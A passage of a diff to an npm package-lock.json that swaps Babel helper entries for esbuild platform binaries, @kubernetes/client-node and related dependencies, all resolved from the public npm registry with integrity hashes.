"node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", + "node_modules/@esbuild/linux-riscv64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.25.5.tgz", + "integrity": "sha512-kTxwu4mLyeOlsVIFPfQo+fQJAV9mh24xL+y+Bm6ej067sYANjyEw1dNHmvoqxJUCMnkBdKpvOn0Ahql6+4VyeA==", + "cpu": [ + "riscv64" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", + "node_modules/@esbuild/linux-s390x": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.25.5.tgz", + "integrity": "sha512-K2dSKTKfmdh78uJ3NcWFiqyRrimfdinS5ErLSn3vluHNeHVnBAFWC8a4X5N+7FgVE1EjXS1QDZbpqZBjfrqMTQ==", + "cpu": [ + "s390x" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", + "node_modules/@esbuild/linux-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.25.5.tgz", + "integrity": "sha512-uhj8N2obKTE6pSZ+aMUbqq+1nXxNjZIIjCjGLfsWvVpy7gKCOL6rsY1MhRh9zLtUtAI7vpgLMK6DxjO8Qm9lJw==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", + "node_modules/@esbuild/netbsd-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.25.5.tgz", + "integrity": "sha512-pwHtMP9viAy1oHPvgxtOv+OkduK5ugofNTVDilIzBLpoWAM16r7b/mxBvfpuQDpRQFMfuVr5aLcn4yveGvBZvw==", + "cpu": [ + "arm64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", + "node_modules/@esbuild/netbsd-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.25.5.tgz", + "integrity": "sha512-WOb5fKrvVTRMfWFNCroYWWklbnXH0Q5rZppjq0vQIdlsQKuw6mdSihwSo4RV/YdQ5UCKKvBy7/0ZZYLBZKIbwQ==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", + "node_modules/@esbuild/openbsd-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.25.5.tgz", + "integrity": "sha512-7A208+uQKgTxHd0G0uqZO8UjK2R0DDb4fDmERtARjSHWxqMTye4Erz4zZafx7Di9Cv+lNHYuncAkiGFySoD+Mw==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", + "node_modules/@esbuild/openbsd-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.25.5.tgz", + "integrity": "sha512-G4hE405ErTWraiZ8UiSoesH8DaCsMm0Cay4fsFWOOUcz8b8rC6uCvnagr+gnioEjWn0wC+o1/TAHt+It+MpIMg==", + "cpu": [ + "x64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", + "node_modules/@esbuild/sunos-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.25.5.tgz", + "integrity": "sha512-l+azKShMy7FxzY0Rj4RCt5VD/q8mG/e+mDivgspo+yL8zW7qEwctQ6YqKX34DTEleFAvCIUviCFX1SDZRSyMQA==", + "cpu": [ + "x64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "sunos" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", + "node_modules/@esbuild/win32-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.25.5.tgz", + "integrity": "sha512-O2S7SNZzdcFG7eFKgvwUEZ2VG9D/sn/eIiz8XRZ1Q/DO5a3s76Xv0mdBzVM5j5R639lXQmPmSo0iRpHqUUrsxw==", + "cpu": [ + "arm64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", + "node_modules/@esbuild/win32-ia32": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.25.5.tgz", + "integrity": "sha512-onOJ02pqs9h1iMJ1PQphR+VZv8qBMQ77Klcsqv9CNW2w6yLqoURLcgERAIurY6QE63bbLuqgP9ATqajFLK5AMQ==", + "cpu": [ + "ia32" + ], "dev": true, - "dependencies": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", + "node_modules/@esbuild/win32-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.25.5.tgz", + "integrity": "sha512-TXv6YnJ8ZMVdX+SXWVBo/0p8LTcrUYngpWjvm91TMjjBQii7Oz11Lw5lbDV5Y0TzuhSJHwiH4hEtC1I42mMS0g==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" + "node_modules/@jsep-plugin/assignment": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", + "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", + "license": "MIT", + "engines": { + "node": ">= 10.16.0" }, + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" + } + }, + "node_modules/@jsep-plugin/regex": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", + "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", + "license": "MIT", "engines": { - "node": ">=4" + "node": ">= 10.16.0" + }, + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" } }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, + "node_modules/@kubernetes/client-node": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", + "license": "Apache-2.0", "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", + "isomorphic-ws": "^5.0.0", + "js-yaml": "^4.1.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", + "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", + "stream-buffers": "^3.0.2", + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/@types/ip-address": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/@types/ip-address/-/ip-address-7.0.0.tgz", + "integrity": "sha512-OyDm4EwZsYPDUjXz3ktiuQE8PJIPO1uUZMfvZMcWmykWjm3WVyI78rAnHkqKV3pMR7iDRKfalI+RxG5JBDUo5w==", + "deprecated": "This is a stub types definition. ip-address provides its own type definitions, so you do not need this installed.", "dev": true, "dependencies": { - "color-name": "1.1.3" + "ip-address": "*" } }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", + "node_modules/@types/js-yaml": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", + "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==" + }, + "node_modules/@types/lodash": { + "version": "4.14.195", + "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.195.tgz", + "integrity": "sha512-Hwx9EUgdwf2GLarOjQp5ZH8ZmblzcbTBC2wtQWNKARBSxM9ezRIAUpeDTgoQRAFB0+8CNWXVA9+MaSOzOF3nPg==", "dev": true }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@types/matcher": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@types/matcher/-/matcher-1.1.0.tgz", + "integrity": "sha512-ABJ5kIpPHprtDTLh3xoB7QoGsqhGa9oUvLRiSBe/Sj0fPrxSpZezkussmjiR+QWtjqhrmfyV9vs6BpPPfygDUQ==", "dev": true, - "engines": { - "node": ">=0.8.0" - } + "license": "MIT" }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/@types/mustache": { + "version": "4.2.6", + "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.2.6.tgz", + "integrity": "sha512-t+8/QWTAhOFlrF1IVZqKnMRJi84EgkIK5Kh0p2JV4OLywUvCwJPFxbJAl7XAow7DVIHsF+xW9f1MVzg0L6Szjw==", "dev": true, - "engines": { - "node": ">=4" - } + "license": "MIT" }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, + "node_modules/@types/node": { + "version": "22.16.0", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.0.tgz", + "integrity": "sha512-B2egV9wALML1JCpv3VQoQ+yesQKAmNMBIAY7OteVrikcOcAkWm+dGL6qpeCktPjAv6N1JLnhbNiqS35UpFyBsQ==", + "license": "MIT", "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" + "undici-types": "~6.21.0" } }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, + "node_modules/@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "@types/node": "*", + "form-data": "^4.0.0" } }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "node_modules/@types/node/node_modules/undici-types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "license": "MIT" }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, + "node_modules/@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "@types/node": "*" } }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node_modules/agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", + "license": "MIT", + "engines": { + "node": ">= 14" } }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "node_modules/argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, + "node_modules/asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==", + "license": "MIT" + }, + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", + "license": "Apache-2.0" + }, + "node_modules/bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "license": "Apache-2.0", + "optional": true + }, + "node_modules/bare-fs": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", + "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" }, "engines": { - "node": ">=6.9.0" + "bare": ">=1.16.0" }, "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "bare-buffer": "*" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + } } }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node_modules/bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "license": "Apache-2.0", + "optional": true, + "engines": { + "bare": ">=1.14.0" } }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, + "node_modules/bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "bare-os": "^3.0.1" } }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "streamx": "^2.21.0" }, "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "bare-buffer": "*", + "bare-events": "*" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } } }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">= 0.4" } }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": 